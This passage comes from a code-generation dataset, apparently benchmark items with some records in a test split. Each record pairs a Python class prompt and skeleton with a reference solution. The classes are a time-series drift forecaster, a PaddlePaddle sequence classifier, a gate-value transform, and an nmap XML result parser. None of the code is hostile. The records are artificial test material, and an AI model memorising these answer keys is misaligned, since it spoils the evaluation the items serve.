0.0\nself._fitted = True\nreturn self", "if not self._fitted:\n raise ValueError('Model is not fitted.')\ndiff_timestamps = X - self.last_obs_ind\nif np.any(diff_timestamps < 0):\n raise ValueError('Timestamps must be higher than the last fitted timestamp ({}).'.format(self.last_obs_ind))\nreturn self.last_obs + diff_timestamps * self.slope"], "bodies_text": "<|body_start_0|>\n self.slope = -1.0\n self.last_obs = -1.0\n self.last_obs_ind = -1\n self._fitted = False\n<|end_body_0|>\n\n<|body_start_1|>\n if X.size != y.size:\n raise ValueError(\"'X' and 'y' size must match.\")\n self.last_obs = y[-1]\n self.last_obs_ind = X[-1]\n if y.size > 1:\n self.slope = (y[-1] - y[0]) / (X[-1] - X[0])\n else:\n self.slope = 0.0\n self._fitted = True\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n if not self._fitted:\n raise ValueError('Model is not fitted.')\n diff_timestamps = X - self.last_obs_ind\n if np.any(diff_timestamps < 0):\n raise ValueError('Timestamps must be higher than the last fitted timestamp ({}).'.format(self.last_obs_ind))\n return self.last_obs + diff_timestamps * self.slope\n<|end_body_2|>\n", "class_docstring": "Naive model with drift for time-series forecasting. In the drift model, the forecasts are equal to the last observation of a given time-series plus an additional value proportional to the forecasted timestamp. The attributed to the timestamp is estimated from the first and last observation of the given time-series.", "class_name": "TSNaiveDrift", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TSNaiveDrift:\n \"\"\"Naive model with drift for time-series forecasting. In the drift model, the forecasts are equal to the last observation of a given time-series plus an additional value proportional to the forecasted timestamp. The attributed to the timestamp is estimated from the first and last observation of the given time-series.\"\"\"\n\n def __init__(self):\n \"\"\"Init a Naive model with drift.\"\"\"\n <|body_0|>\n\n def fit(self, X: np.ndarray, y: np.ndarray, **kwargs) -> 'TSNaiveDrift':\n \"\"\"Fit a Naive model with drift. This model calculates the slope of the line crossing the first and last observation of ``y``, and stores it alongside the last observation value of ``y`` and its timestamp. 
This is equivalent of calculating the mean of the slopes between each pair of adjacent observation, since it is a telescoping sum, and use it as the model drift coefficient.\"\"\"\n <|body_1|>\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"Predict new observations from the timestamps 'X'.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.slope = -1.0\n self.last_obs = -1.0\n self.last_obs_ind = -1\n self._fitted = False\n<|end_body_0|>\n\n<|body_start_1|>\n if X.size != y.size:\n raise ValueError(\"'X' and 'y' size must match.\")\n self.last_obs = y[-1]\n self.last_obs_ind = X[-1]\n if y.size > 1:\n self.slope = (y[-1] - y[0]) / (X[-1] - X[0])\n else:\n self.slope = 0.0\n self._fitted = True\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n if not self._fitted:\n raise ValueError('Model is not fitted.')\n diff_timestamps = X - self.last_obs_ind\n if np.any(diff_timestamps < 0):\n raise ValueError('Timestamps must be higher than the last fitted timestamp ({}).'.format(self.last_obs_ind))\n return self.last_obs + diff_timestamps * self.slope\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000032", "length_bytes": 12299, "license_type": "permissive", "methods": [{"docstring": "Init a Naive model with drift.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Fit a Naive model with drift. This model calculates the slope of the line crossing the first and last observation of ``y``, and stores it alongside the last observation value of ``y`` and its timestamp. This is equivalent of calculating the mean of the slopes between each pair of adjacent observation, since it is a telescoping sum, and use it as the model drift coefficient.", "name": "fit", "signature": "def fit(self, X: np.ndarray, y: np.ndarray, **kwargs) -> 'TSNaiveDrift'"}, {"docstring": "Predict new observations from the timestamps 'X'.", "name": "predict", "signature": "def predict(self, X: np.ndarray) -> np.ndarray"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_004496", "prompt": "Implement the Python class `TSNaiveDrift` described below.\n\nClass description:\nNaive model with drift for time-series forecasting. In the drift model, the forecasts are equal to the last observation of a given time-series plus an additional value proportional to the forecasted timestamp. The attributed to the timestamp is estimated from the first and last observation of the given time-series.\n\nMethod signatures and docstrings:\n- def __init__(self): Init a Naive model with drift.\n- def fit(self, X: np.ndarray, y: np.ndarray, **kwargs) -> 'TSNaiveDrift': Fit a Naive model with drift. This model calculates the slope of the line crossing the first and last observation of ``y``, and stores it alongside the last observation value of ``y`` and its timestamp. This is equivalent of calculating the mean of the slopes between each pair of adjacent observation, since it is a telescoping sum, and use it as the model drift coefficient.\n- def predict(self, X: np.ndarray) -> np.ndarray: Predict new observations from the timestamps 'X'.", "prompted_full_text": "Implement the Python class `TSNaiveDrift` described below.\n\nClass description:\nNaive model with drift for time-series forecasting. In the drift model, the forecasts are equal to the last observation of a given time-series plus an additional value proportional to the forecasted timestamp. 
The attributed to the timestamp is estimated from the first and last observation of the given time-series.\n\nMethod signatures and docstrings:\n- def __init__(self): Init a Naive model with drift.\n- def fit(self, X: np.ndarray, y: np.ndarray, **kwargs) -> 'TSNaiveDrift': Fit a Naive model with drift. This model calculates the slope of the line crossing the first and last observation of ``y``, and stores it alongside the last observation value of ``y`` and its timestamp. This is equivalent of calculating the mean of the slopes between each pair of adjacent observation, since it is a telescoping sum, and use it as the model drift coefficient.\n- def predict(self, X: np.ndarray) -> np.ndarray: Predict new observations from the timestamps 'X'.\n\n<|skeleton|>\nclass TSNaiveDrift:\n \"\"\"Naive model with drift for time-series forecasting. In the drift model, the forecasts are equal to the last observation of a given time-series plus an additional value proportional to the forecasted timestamp. The attributed to the timestamp is estimated from the first and last observation of the given time-series.\"\"\"\n\n def __init__(self):\n \"\"\"Init a Naive model with drift.\"\"\"\n <|body_0|>\n\n def fit(self, X: np.ndarray, y: np.ndarray, **kwargs) -> 'TSNaiveDrift':\n \"\"\"Fit a Naive model with drift. This model calculates the slope of the line crossing the first and last observation of ``y``, and stores it alongside the last observation value of ``y`` and its timestamp. This is equivalent of calculating the mean of the slopes between each pair of adjacent observation, since it is a telescoping sum, and use it as the model drift coefficient.\"\"\"\n <|body_1|>\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"Predict new observations from the timestamps 'X'.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.slope = -1.0\n self.last_obs = -1.0\n self.last_obs_ind = -1\n self._fitted = False\n<|end_body_0|>\n\n<|body_start_1|>\n if X.size != y.size:\n raise ValueError(\"'X' and 'y' size must match.\")\n self.last_obs = y[-1]\n self.last_obs_ind = X[-1]\n if y.size > 1:\n self.slope = (y[-1] - y[0]) / (X[-1] - X[0])\n else:\n self.slope = 0.0\n self._fitted = True\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n if not self._fitted:\n raise ValueError('Model is not fitted.')\n diff_timestamps = X - self.last_obs_ind\n if np.any(diff_timestamps < 0):\n raise ValueError('Timestamps must be higher than the last fitted timestamp ({}).'.format(self.last_obs_ind))\n return self.last_obs + diff_timestamps * self.slope\n<|end_body_2|>\n", "revision_id": "61cc1f63fa055c7466151cfefa7baff8df1702b7", "skeleton": "<|skeleton|>\nclass TSNaiveDrift:\n \"\"\"Naive model with drift for time-series forecasting. In the drift model, the forecasts are equal to the last observation of a given time-series plus an additional value proportional to the forecasted timestamp. The attributed to the timestamp is estimated from the first and last observation of the given time-series.\"\"\"\n\n def __init__(self):\n \"\"\"Init a Naive model with drift.\"\"\"\n <|body_0|>\n\n def fit(self, X: np.ndarray, y: np.ndarray, **kwargs) -> 'TSNaiveDrift':\n \"\"\"Fit a Naive model with drift. This model calculates the slope of the line crossing the first and last observation of ``y``, and stores it alongside the last observation value of ``y`` and its timestamp. 
This is equivalent of calculating the mean of the slopes between each pair of adjacent observation, since it is a telescoping sum, and use it as the model drift coefficient.\"\"\"\n <|body_1|>\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"Predict new observations from the timestamps 'X'.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TSNaiveDrift:\n \"\"\"Naive model with drift for time-series forecasting. In the drift model, the forecasts are equal to the last observation of a given time-series plus an additional value proportional to the forecasted timestamp. The attributed to the timestamp is estimated from the first and last observation of the given time-series.\"\"\"\n\n def __init__(self):\n \"\"\"Init a Naive model with drift.\"\"\"\n self.slope = -1.0\n self.last_obs = -1.0\n self.last_obs_ind = -1\n self._fitted = False\n\n def fit(self, X: np.ndarray, y: np.ndarray, **kwargs) -> 'TSNaiveDrift':\n \"\"\"Fit a Naive model with drift. This model calculates the slope of the line crossing the first and last observation of ``y``, and stores it alongside the last observation value of ``y`` and its timestamp. This is equivalent of calculating the mean of the slopes between each pair of adjacent observation, since it is a telescoping sum, and use it as the model drift coefficient.\"\"\"\n if X.size != y.size:\n raise ValueError(\"'X' and 'y' size must match.\")\n self.last_obs = y[-1]\n self.last_obs_ind = X[-1]\n if y.size > 1:\n self.slope = (y[-1] - y[0]) / (X[-1] - X[0])\n else:\n self.slope = 0.0\n self._fitted = True\n return self\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"Predict new observations from the timestamps 'X'.\"\"\"\n if not self._fitted:\n raise ValueError('Model is not fitted.')\n diff_timestamps = X - self.last_obs_ind\n if np.any(diff_timestamps < 0):\n raise ValueError('Timestamps must be higher than the last fitted timestamp ({}).'.format(self.last_obs_ind))\n return self.last_obs + diff_timestamps * self.slope\n", "source": "the_stack_v2_python_sparse", "source_path": "tspymfe/_models.py", "source_repo": "FelSiq/ts-pymfe", "split": "test", "star_events_count": 9} {"blob_id": "4461b2eba907b9afb6292ad0ef79f692485cc5db", "bodies": ["super(SeqClassificationTaskModel, self).__init__()\nmodel_type = model_config.get('model_type', 'transformer')\nhidden_size = model_config.get('hidden_size', 512)\nin_channels = hidden_size * 2 if model_type == 'lstm' else hidden_size\nself.conv_decoder = nn.Sequential(nn.Conv1D(in_channels=in_channels, out_channels=128, kernel_size=5, padding='same', data_format='NLC'), nn.ReLU(), nn.Conv1D(in_channels=128, out_channels=class_num, kernel_size=3, padding='same', data_format='NLC'))\nself.encoder_model = encoder_model", "encoder_output = self.encoder_model(input, pos)\ndecoder_output = self.conv_decoder(encoder_output)\nreturn decoder_output"], "bodies_text": "<|body_start_0|>\n super(SeqClassificationTaskModel, self).__init__()\n model_type = model_config.get('model_type', 'transformer')\n hidden_size = model_config.get('hidden_size', 512)\n in_channels = hidden_size * 2 if model_type == 'lstm' else hidden_size\n self.conv_decoder = nn.Sequential(nn.Conv1D(in_channels=in_channels, out_channels=128, kernel_size=5, padding='same', data_format='NLC'), nn.ReLU(), nn.Conv1D(in_channels=128, out_channels=class_num, kernel_size=3, padding='same', data_format='NLC'))\n self.encoder_model = 
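The TSNaiveDrift docstring asserts that the endpoint slope equals the mean of the adjacent-pair slopes because the sum telescopes; that identity holds exactly when the timestamps are uniformly spaced. A short numpy check of the claim, followed by the drift forecast itself:

import numpy as np

X = np.array([0.0, 1.0, 2.0, 3.0, 4.0])
y = np.array([2.0, 2.5, 2.0, 4.0, 5.0])

# Telescoping: with uniform spacing, the mean of adjacent slopes
# collapses to the slope between the first and last observation.
adjacent_slopes = np.diff(y) / np.diff(X)
endpoint_slope = (y[-1] - y[0]) / (X[-1] - X[0])
assert np.isclose(adjacent_slopes.mean(), endpoint_slope)

# The drift forecast: last observation plus slope times elapsed time.
X_new = np.array([5.0, 6.0])
print(y[-1] + (X_new - X[-1]) * endpoint_slope)  # [5.75 6.5 ]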
encoder_model\n<|end_body_0|>\n\n<|body_start_1|>\n encoder_output = self.encoder_model(input, pos)\n decoder_output = self.conv_decoder(encoder_output)\n return decoder_output\n<|end_body_1|>\n", "class_docstring": "SeqClassificationTaskModel", "class_name": "SeqClassificationTaskModel", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SeqClassificationTaskModel:\n \"\"\"SeqClassificationTaskModel\"\"\"\n\n def __init__(self, class_num, model_config, encoder_model):\n \"\"\"__init__\"\"\"\n <|body_0|>\n\n def forward(self, input, pos):\n \"\"\"forward\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(SeqClassificationTaskModel, self).__init__()\n model_type = model_config.get('model_type', 'transformer')\n hidden_size = model_config.get('hidden_size', 512)\n in_channels = hidden_size * 2 if model_type == 'lstm' else hidden_size\n self.conv_decoder = nn.Sequential(nn.Conv1D(in_channels=in_channels, out_channels=128, kernel_size=5, padding='same', data_format='NLC'), nn.ReLU(), nn.Conv1D(in_channels=128, out_channels=class_num, kernel_size=3, padding='same', data_format='NLC'))\n self.encoder_model = encoder_model\n<|end_body_0|>\n\n<|body_start_1|>\n encoder_output = self.encoder_model(input, pos)\n decoder_output = self.conv_decoder(encoder_output)\n return decoder_output\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000033", "length_bytes": 17522, "license_type": "permissive", "methods": [{"docstring": "__init__", "name": "__init__", "signature": "def __init__(self, class_num, model_config, encoder_model)"}, {"docstring": "forward", "name": "forward", "signature": "def forward(self, input, pos)"}], "n_methods": 2, "prompt": "Implement the Python class `SeqClassificationTaskModel` described below.\n\nClass description:\nSeqClassificationTaskModel\n\nMethod signatures and docstrings:\n- def __init__(self, class_num, model_config, encoder_model): __init__\n- def forward(self, input, pos): forward", "prompted_full_text": "Implement the Python class `SeqClassificationTaskModel` described below.\n\nClass description:\nSeqClassificationTaskModel\n\nMethod signatures and docstrings:\n- def __init__(self, class_num, model_config, encoder_model): __init__\n- def forward(self, input, pos): forward\n\n<|skeleton|>\nclass SeqClassificationTaskModel:\n \"\"\"SeqClassificationTaskModel\"\"\"\n\n def __init__(self, class_num, model_config, encoder_model):\n \"\"\"__init__\"\"\"\n <|body_0|>\n\n def forward(self, input, pos):\n \"\"\"forward\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(SeqClassificationTaskModel, self).__init__()\n model_type = model_config.get('model_type', 'transformer')\n hidden_size = model_config.get('hidden_size', 512)\n in_channels = hidden_size * 2 if model_type == 'lstm' else hidden_size\n self.conv_decoder = nn.Sequential(nn.Conv1D(in_channels=in_channels, out_channels=128, kernel_size=5, padding='same', data_format='NLC'), nn.ReLU(), nn.Conv1D(in_channels=128, out_channels=class_num, kernel_size=3, padding='same', data_format='NLC'))\n self.encoder_model = encoder_model\n<|end_body_0|>\n\n<|body_start_1|>\n encoder_output = self.encoder_model(input, pos)\n decoder_output = self.conv_decoder(encoder_output)\n return decoder_output\n<|end_body_1|>\n", "revision_id": "e6ab0261eb719c21806bbadfd94001ecfe27de45", "skeleton": "<|skeleton|>\nclass SeqClassificationTaskModel:\n \"\"\"SeqClassificationTaskModel\"\"\"\n\n def __init__(self, class_num, 
model_config, encoder_model):\n \"\"\"__init__\"\"\"\n <|body_0|>\n\n def forward(self, input, pos):\n \"\"\"forward\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SeqClassificationTaskModel:\n \"\"\"SeqClassificationTaskModel\"\"\"\n\n def __init__(self, class_num, model_config, encoder_model):\n \"\"\"__init__\"\"\"\n super(SeqClassificationTaskModel, self).__init__()\n model_type = model_config.get('model_type', 'transformer')\n hidden_size = model_config.get('hidden_size', 512)\n in_channels = hidden_size * 2 if model_type == 'lstm' else hidden_size\n self.conv_decoder = nn.Sequential(nn.Conv1D(in_channels=in_channels, out_channels=128, kernel_size=5, padding='same', data_format='NLC'), nn.ReLU(), nn.Conv1D(in_channels=128, out_channels=class_num, kernel_size=3, padding='same', data_format='NLC'))\n self.encoder_model = encoder_model\n\n def forward(self, input, pos):\n \"\"\"forward\"\"\"\n encoder_output = self.encoder_model(input, pos)\n decoder_output = self.conv_decoder(encoder_output)\n return decoder_output\n", "source": "the_stack_v2_python_sparse", "source_path": "pahelix/model_zoo/protein_sequence_model.py", "source_repo": "PaddlePaddle/PaddleHelix", "split": "test", "star_events_count": 771} {"blob_id": "0e352c78ca46c6854752a32f00b2a795c189e088", "bodies": ["self.Vmatrix = np.array(Vmatrix).astype(float)\nself.sourcenames = sourcenames\nself.targetnames = targetnames", "vals2Dout = {}\nzz = np.zeros(nn if nn is not None else (), dtype=float)\nif isinstance(vals2D, dict):\n xx = [vals2D.get(s, zz) for s in self.sourcenames]\n xx = [x.flatten() for x in xx]\n gate_values = np.vstack(xx).astype(float)\nelse:\n gate_values = np.array(vals2D).astype(float)\ngate_values_out = pgeometry.projectiveTransformation(self.Vmatrix, gate_values)\nfor j, n in enumerate(self.targetnames):\n vals2Dout[n] = gate_values_out[j].reshape(nn).astype(float)\nreturn vals2Dout"], "bodies_text": "<|body_start_0|>\n self.Vmatrix = np.array(Vmatrix).astype(float)\n self.sourcenames = sourcenames\n self.targetnames = targetnames\n<|end_body_0|>\n\n<|body_start_1|>\n vals2Dout = {}\n zz = np.zeros(nn if nn is not None else (), dtype=float)\n if isinstance(vals2D, dict):\n xx = [vals2D.get(s, zz) for s in self.sourcenames]\n xx = [x.flatten() for x in xx]\n gate_values = np.vstack(xx).astype(float)\n else:\n gate_values = np.array(vals2D).astype(float)\n gate_values_out = pgeometry.projectiveTransformation(self.Vmatrix, gate_values)\n for j, n in enumerate(self.targetnames):\n vals2Dout[n] = gate_values_out[j].reshape(nn).astype(float)\n return vals2Dout\n<|end_body_1|>\n", "class_docstring": "", "class_name": "GateTransform", "detected_licenses": ["LicenseRef-scancode-unknown-license-reference", "MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass GateTransform:\n\n def __init__(self, Vmatrix, sourcenames, targetnames):\n \"\"\"Class to describe a linear transformation between source and target gates.\"\"\"\n <|body_0|>\n\n def transformGateScan(self, vals2D, nn=None):\n \"\"\"Get a list of parameter names and [c1 c2 c3 c4] 'corner' values to generate dictionary self.vals2D[name] = matrix of values. Args: vals2D (dict): keys are the gate names, values are matrices with the gate values. nn : TODO. 
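The SeqClassificationTaskModel record is PaddlePaddle code: `nn.Conv1D(..., data_format='NLC')` consumes the encoder output as (batch, length, channels). For readers without Paddle, a PyTorch analogue of the same two-layer conv decoder follows; `torch.nn.Conv1d` is channels-first, so the sketch transposes around it, `padding='same'` needs PyTorch 1.9+, and `class_num` here is an arbitrary example value:

import torch
import torch.nn as nn

hidden_size, class_num = 512, 8
decoder = nn.Sequential(
    nn.Conv1d(hidden_size, 128, kernel_size=5, padding='same'),
    nn.ReLU(),
    nn.Conv1d(128, class_num, kernel_size=3, padding='same'),
)

# Paddle's NLC layout is (batch, length, channels); torch wants
# (batch, channels, length), hence the transposes.
encoder_output = torch.randn(4, 100, hidden_size)
logits = decoder(encoder_output.transpose(1, 2)).transpose(1, 2)
print(logits.shape)  # torch.Size([4, 100, 8]): per-position class logits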
Returns: dict: tranformed gate values.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.Vmatrix = np.array(Vmatrix).astype(float)\n self.sourcenames = sourcenames\n self.targetnames = targetnames\n<|end_body_0|>\n\n<|body_start_1|>\n vals2Dout = {}\n zz = np.zeros(nn if nn is not None else (), dtype=float)\n if isinstance(vals2D, dict):\n xx = [vals2D.get(s, zz) for s in self.sourcenames]\n xx = [x.flatten() for x in xx]\n gate_values = np.vstack(xx).astype(float)\n else:\n gate_values = np.array(vals2D).astype(float)\n gate_values_out = pgeometry.projectiveTransformation(self.Vmatrix, gate_values)\n for j, n in enumerate(self.targetnames):\n vals2Dout[n] = gate_values_out[j].reshape(nn).astype(float)\n return vals2Dout\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000034", "length_bytes": 28215, "license_type": "permissive", "methods": [{"docstring": "Class to describe a linear transformation between source and target gates.", "name": "__init__", "signature": "def __init__(self, Vmatrix, sourcenames, targetnames)"}, {"docstring": "Get a list of parameter names and [c1 c2 c3 c4] 'corner' values to generate dictionary self.vals2D[name] = matrix of values. Args: vals2D (dict): keys are the gate names, values are matrices with the gate values. nn : TODO. Returns: dict: tranformed gate values.", "name": "transformGateScan", "signature": "def transformGateScan(self, vals2D, nn=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_003216", "prompt": "Implement the Python class `GateTransform` described below.\n\nClass description:\nImplement the GateTransform class.\n\nMethod signatures and docstrings:\n- def __init__(self, Vmatrix, sourcenames, targetnames): Class to describe a linear transformation between source and target gates.\n- def transformGateScan(self, vals2D, nn=None): Get a list of parameter names and [c1 c2 c3 c4] 'corner' values to generate dictionary self.vals2D[name] = matrix of values. Args: vals2D (dict): keys are the gate names, values are matrices with the gate values. nn : TODO. Returns: dict: tranformed gate values.", "prompted_full_text": "Implement the Python class `GateTransform` described below.\n\nClass description:\nImplement the GateTransform class.\n\nMethod signatures and docstrings:\n- def __init__(self, Vmatrix, sourcenames, targetnames): Class to describe a linear transformation between source and target gates.\n- def transformGateScan(self, vals2D, nn=None): Get a list of parameter names and [c1 c2 c3 c4] 'corner' values to generate dictionary self.vals2D[name] = matrix of values. Args: vals2D (dict): keys are the gate names, values are matrices with the gate values. nn : TODO. Returns: dict: tranformed gate values.\n\n<|skeleton|>\nclass GateTransform:\n\n def __init__(self, Vmatrix, sourcenames, targetnames):\n \"\"\"Class to describe a linear transformation between source and target gates.\"\"\"\n <|body_0|>\n\n def transformGateScan(self, vals2D, nn=None):\n \"\"\"Get a list of parameter names and [c1 c2 c3 c4] 'corner' values to generate dictionary self.vals2D[name] = matrix of values. Args: vals2D (dict): keys are the gate names, values are matrices with the gate values. nn : TODO. 
Returns: dict: tranformed gate values.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.Vmatrix = np.array(Vmatrix).astype(float)\n self.sourcenames = sourcenames\n self.targetnames = targetnames\n<|end_body_0|>\n\n<|body_start_1|>\n vals2Dout = {}\n zz = np.zeros(nn if nn is not None else (), dtype=float)\n if isinstance(vals2D, dict):\n xx = [vals2D.get(s, zz) for s in self.sourcenames]\n xx = [x.flatten() for x in xx]\n gate_values = np.vstack(xx).astype(float)\n else:\n gate_values = np.array(vals2D).astype(float)\n gate_values_out = pgeometry.projectiveTransformation(self.Vmatrix, gate_values)\n for j, n in enumerate(self.targetnames):\n vals2Dout[n] = gate_values_out[j].reshape(nn).astype(float)\n return vals2Dout\n<|end_body_1|>\n", "revision_id": "208c9c53309e10484e9883d537b53282cb83a43d", "skeleton": "<|skeleton|>\nclass GateTransform:\n\n def __init__(self, Vmatrix, sourcenames, targetnames):\n \"\"\"Class to describe a linear transformation between source and target gates.\"\"\"\n <|body_0|>\n\n def transformGateScan(self, vals2D, nn=None):\n \"\"\"Get a list of parameter names and [c1 c2 c3 c4] 'corner' values to generate dictionary self.vals2D[name] = matrix of values. Args: vals2D (dict): keys are the gate names, values are matrices with the gate values. nn : TODO. Returns: dict: tranformed gate values.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class GateTransform:\n def __init__(self, Vmatrix, sourcenames, targetnames):\n \"\"\"Class to describe a linear transformation between source and target gates.\"\"\"\n self.Vmatrix = np.array(Vmatrix).astype(float)\n self.sourcenames = sourcenames\n self.targetnames = targetnames\n\n def transformGateScan(self, vals2D, nn=None):\n \"\"\"Get a list of parameter names and [c1 c2 c3 c4] 'corner' values to generate dictionary self.vals2D[name] = matrix of values. Args: vals2D (dict): keys are the gate names, values are matrices with the gate values. nn : TODO. 
Returns: dict: tranformed gate values.\"\"\"\n vals2Dout = {}\n zz = np.zeros(nn if nn is not None else (), dtype=float)\n if isinstance(vals2D, dict):\n xx = [vals2D.get(s, zz) for s in self.sourcenames]\n xx = [x.flatten() for x in xx]\n gate_values = np.vstack(xx).astype(float)\n else:\n gate_values = np.array(vals2D).astype(float)\n gate_values_out = pgeometry.projectiveTransformation(self.Vmatrix, gate_values)\n for j, n in enumerate(self.targetnames):\n vals2Dout[n] = gate_values_out[j].reshape(nn).astype(float)\n return vals2Dout\n", "source": "the_stack_v2_python_sparse", "source_path": "src/qtt/simulation/dotsystem.py", "source_repo": "QuTech-Delft/qtt", "split": "test", "star_events_count": 58} {"blob_id": "4e17baec440eed22ff47d5ed9e440e91edc021ef", "bodies": ["pidb = ParsedItemsDb()\nif is_zip(path):\n with ZipFile(path) as fzip:\n for fname in filter(lambda x: re.match(cls.ARCHIVE_PATHS, x), fzip.namelist()):\n pidb = cls._parse_data(file_from_zip(path, fname).decode('utf-8'), pidb)\n return pidb\nreturn cls._parse_data(Path(path).read_text(encoding='utf-8'), pidb)", "report = libnmap.parser.NmapParser.parse_fromstring(data)\nfor ihost in report.hosts:\n via_target = ihost.user_target_hostname or ihost.address\n import_time = datetime.fromtimestamp(int(ihost.starttime or time()))\n host_data = {}\n if ihost.hostnames:\n host_data['hostnames'] = list(set(ihost.hostnames))\n if not host_data.get('hostname'):\n host_data['hostname'] = host_data['hostnames'][0]\n for osmatch in [item for item in ihost.os_match_probabilities() if item.accuracy == 100]:\n host_data['os'] = osmatch.name\n pidb.upsert_note(ihost.address, 'cpe', data=json.dumps(osmatch.get_cpe()))\n pidb.upsert_host(ihost.address, **host_data)\n for iscript in ihost.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", via_target=via_target, data=json.dumps(iscript), import_time=import_time)\n for iservice in ihost.services:\n service_data = {'state': f'{iservice.state}:{iservice.reason}', 'import_time': import_time}\n if iservice.service:\n service_data['name'] = iservice.service\n if iservice.banner:\n service_data['info'] = iservice.banner\n pidb.upsert_service(ihost.address, iservice.protocol, iservice.port, **service_data)\n if iservice.cpelist:\n pidb.upsert_note(ihost.address, 'cpe', iservice.protocol, iservice.port, via_target, data=json.dumps([x.cpestring for x in iservice.cpelist]), import_time=import_time)\n for iscript in iservice.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", iservice.protocol, iservice.port, via_target, data=json.dumps(iscript), import_time=import_time)\nreturn pidb"], "bodies_text": "<|body_start_0|>\n pidb = ParsedItemsDb()\n if is_zip(path):\n with ZipFile(path) as fzip:\n for fname in filter(lambda x: re.match(cls.ARCHIVE_PATHS, x), fzip.namelist()):\n pidb = cls._parse_data(file_from_zip(path, fname).decode('utf-8'), pidb)\n return pidb\n return cls._parse_data(Path(path).read_text(encoding='utf-8'), pidb)\n<|end_body_0|>\n\n<|body_start_1|>\n report = libnmap.parser.NmapParser.parse_fromstring(data)\n for ihost in report.hosts:\n via_target = ihost.user_target_hostname or ihost.address\n import_time = datetime.fromtimestamp(int(ihost.starttime or time()))\n host_data = {}\n if ihost.hostnames:\n host_data['hostnames'] = list(set(ihost.hostnames))\n if not host_data.get('hostname'):\n host_data['hostname'] = host_data['hostnames'][0]\n for osmatch in [item for item in ihost.os_match_probabilities() if item.accuracy == 100]:\n 
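`pgeometry.projectiveTransformation` in the GateTransform record is a qtt helper whose exact conventions are not shown here, so the following is only an illustrative numpy sketch of a projective (homogeneous-coordinate) map applied to column-stacked gate values, with a made-up cross-capacitance matrix:

import numpy as np

def projective_transform(H, points):
    # points has shape (ndim, npoints). Lift to homogeneous coordinates,
    # apply H, then divide out the final coordinate; with an affine H the
    # divisor stays 1 and this reduces to a linear map plus an offset.
    hom = H @ np.vstack([points, np.ones((1, points.shape[1]))])
    return hom[:-1] / hom[-1]

# Hypothetical 2-gate correction matrix; the values are illustrative only.
V = np.array([[1.0, 0.2, 0.0],
              [0.1, 1.0, 0.0],
              [0.0, 0.0, 1.0]])
gates = np.array([[0.0, 1.0, 2.0],   # swept source gate
                  [5.0, 5.0, 5.0]])  # source gate held fixed
print(projective_transform(V, gates))  # [[1.  2.  3. ] [5.  5.1 5.2]]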
host_data['os'] = osmatch.name\n pidb.upsert_note(ihost.address, 'cpe', data=json.dumps(osmatch.get_cpe()))\n pidb.upsert_host(ihost.address, **host_data)\n for iscript in ihost.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", via_target=via_target, data=json.dumps(iscript), import_time=import_time)\n for iservice in ihost.services:\n service_data = {'state': f'{iservice.state}:{iservice.reason}', 'import_time': import_time}\n if iservice.service:\n service_data['name'] = iservice.service\n if iservice.banner:\n service_data['info'] = iservice.banner\n pidb.upsert_service(ihost.address, iservice.protocol, iservice.port, **service_data)\n if iservice.cpelist:\n pidb.upsert_note(ihost.address, 'cpe', iservice.protocol, iservice.port, via_target, data=json.dumps([x.cpestring for x in iservice.cpelist]), import_time=import_time)\n for iscript in iservice.scripts_results:\n pidb.upsert_note(ihost.address, f\"nmap.{iscript['id']}\", iservice.protocol, iservice.port, via_target, data=json.dumps(iscript), import_time=import_time)\n return pidb\n<|end_body_1|>\n", "class_docstring": "nmap xml output parser", "class_name": "ParserModule", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ParserModule:\n \"\"\"nmap xml output parser\"\"\"\n\n def parse_path(cls, path):\n \"\"\"parse data from path\"\"\"\n <|body_0|>\n\n def _parse_data(cls, data, pidb):\n \"\"\"parse raw string data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n pidb = ParsedItemsDb()\n if is_zip(path):\n with ZipFile(path) as fzip:\n for fname in filter(lambda x: re.match(cls.ARCHIVE_PATHS, x), fzip.namelist()):\n pidb = cls._parse_data(file_from_zip(path, fname).decode('utf-8'), pidb)\n return pidb\n return cls._parse_data(Path(path).read_text(encoding='utf-8'), pidb)\n<|end_body_0|>\n\n<|body_start_1|>\n report = 